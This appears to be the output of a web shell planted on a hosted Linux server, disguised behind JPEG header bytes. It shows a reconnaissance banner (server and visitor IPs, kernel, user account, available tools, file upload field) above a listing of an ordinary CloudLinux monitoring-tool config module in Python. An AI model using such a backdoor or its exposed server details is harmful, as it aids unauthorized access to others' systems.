????JFIF??x?x????'
| Server IP : 104.21.30.238  /  Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /././opt/cloudlinux/venv/lib/python3.11/site-packages/wmt/common/ | 
| Upload File : | 
#!/opt/cloudlinux/venv/bin/python3
import logging
import os
import fnmatch
import json
from dataclasses import dataclass, asdict, field
from wmt.common.const import CONFIG_PATH, PING_CONNECTIONS
from wmt.common.exceptions import WmtConfigException
from wmt.common.url_parser import parse
from clcommon.cpapi import get_admin_email
from socket import gethostname
from typing import List
@dataclass
class Cfg:
    """
    Default values, in case config has not been specified yet
    """
    ping_interval: int = 30
    ping_timeout: int = 10
    ping_connections: int = PING_CONNECTIONS
    report_email: str = None
    report_top: int = 4
    ignore_list: List[str] = field(default_factory=list)
    summary_notification_enabled: bool = True
    alert_notifications_enabled: bool = False
class ConfigManager:
    def __init__(self):
        self.allowed_params = Cfg.__dataclass_fields__.keys()
        self.from_email = f'web-monitoring-tool@{gethostname()}'
        self.default_report_email = get_admin_email()
        self.cfg = self._init_cfg()
        # self.ignored_domains is used as cache for checking domains if it is ignored or not
        self._ignored_domains = self.generate_ignored_domains()
        self.target_email = self._get_target_email()
    def _get_target_email(self):
        """
        This function checks to see which email address to use for TO: field of smtp.
        If report_email has been defined by user then report_email will be used.
        By default (in case not defined by user) default_report_email will be used
        """
        return self.cfg.report_email if self.cfg.report_email else self.default_report_email
    def to_dict(self):
        return asdict(self.cfg)
    def _init_cfg(self) -> Cfg:
        # if not present - use defaults
        if not self.is_present():
            return Cfg()
        data = self.read()
        cfg = Cfg()
        for key, value in data.items():
            if key not in self.allowed_params:
                logging.warning(
                    f'unsupported parameter "{key}", please ensure config contains'
                    f' only allowed parameters: {list(self.allowed_params)}'
                )
            else:
                setattr(cfg, key, value)
        return cfg
    @staticmethod
    def is_present():
        return os.path.isfile(CONFIG_PATH)
    def modify(self, new_json: str):
        """
        Changes configuration of wmt
        Returns:
            self.to_dict()
        Raises:
            WmtConfigException
        Example:
            wmt-api-solo --config-change {'key': 'val'}
        """
        try:
            new_config = json.loads(new_json)
        except json.JSONDecodeError as e:
            raise WmtConfigException(str(e))
        if not set(new_config.keys()).issubset(self.allowed_params):
            raise WmtConfigException(f'some of passed params are unsupported, '
                                     f'only allowed parameters: {list(self.allowed_params)}')
        config = {
            **self.to_dict(),
            **new_config
        }
        if config.get('ignore_list') and isinstance(config.get('ignore_list'), str):
            config['ignore_list'] = config['ignore_list'].split(',')
        # Write config to /etc/wmt/config.json file
        with open(CONFIG_PATH, 'w') as f:
            json.dump(config, f, indent=4)
        self.cfg = Cfg(**config)
        return self.to_dict()
    @staticmethod
    def read():
        try:
            with open(CONFIG_PATH) as f:
                data = json.load(f)
        except json.JSONDecodeError as e:
            raise WmtConfigException(str(e))
        return data
    def reload(self):
        self.cfg = self._init_cfg()
    def is_domain_ignored(self, domain) -> bool:
        """
        Check if domain is in ignored list.
        If record contain *" then it will be processed as wildcard. Else as substring
        """
        for pattern in self._ignored_domains:
            if '*' in pattern:
                # set * on the first position if it not set to allow filter without scheme (e.g. domain.com)
                if not pattern.startswith('*'):
                    pattern = f"*{pattern}"
                if fnmatch.fnmatch(domain, pattern):
                    return True
            else:
                if pattern in domain:
                    return True
        return False
    def generate_ignored_domains(self) -> set:
        """
        Generates ignored domains patterns from self.ignore_list and
        returns it for using as cache in self.ignored_domains set().
        """
        patterns = set()
        for pattern in self.cfg.ignore_list:
            patterns.add(pattern)
        return patterns